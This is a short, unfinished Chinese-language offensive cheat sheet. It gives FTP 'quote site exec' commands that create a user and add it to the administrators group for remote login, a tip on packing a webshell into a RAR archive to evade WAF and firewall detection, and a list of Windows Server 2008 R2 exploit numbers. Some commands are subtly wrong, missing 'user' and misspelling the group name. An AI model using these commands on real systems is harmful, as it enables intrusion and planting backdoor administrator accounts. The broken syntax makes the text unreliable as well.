| 提權命令:quote site exec net fuchou fuchou /add '返回200或者TID=33則說明成功執行。添加OK直接終端連接日之
| quote site exec net localgroup administrator fuchou /add
|
|
|
--------------------------------------------------------------------------------------------
| 雜談繞過waf/繞過防火牆/
| 1. rar在dos下的執行/壓縮文件在dos下的執行
| 思路:可以把馬子打包到rar里面然后在解壓。
| 例: c:\winrar\winrar.exe a -k -r -s -m3 d:\1.rar c:\test //將c:\test文件打包到d盤的1.rar
| 用途:打包任意文件
|
|
|
|
|
|
|
|
|
|
|
|
|--------------------------------------------------------------------------------------------
| /08r2/windows2008 exp/08 r2 exp/2008
| 14058 15010 15015 15051 15077 16016 16032
|
|
|
|
|
|
未完成. 待續....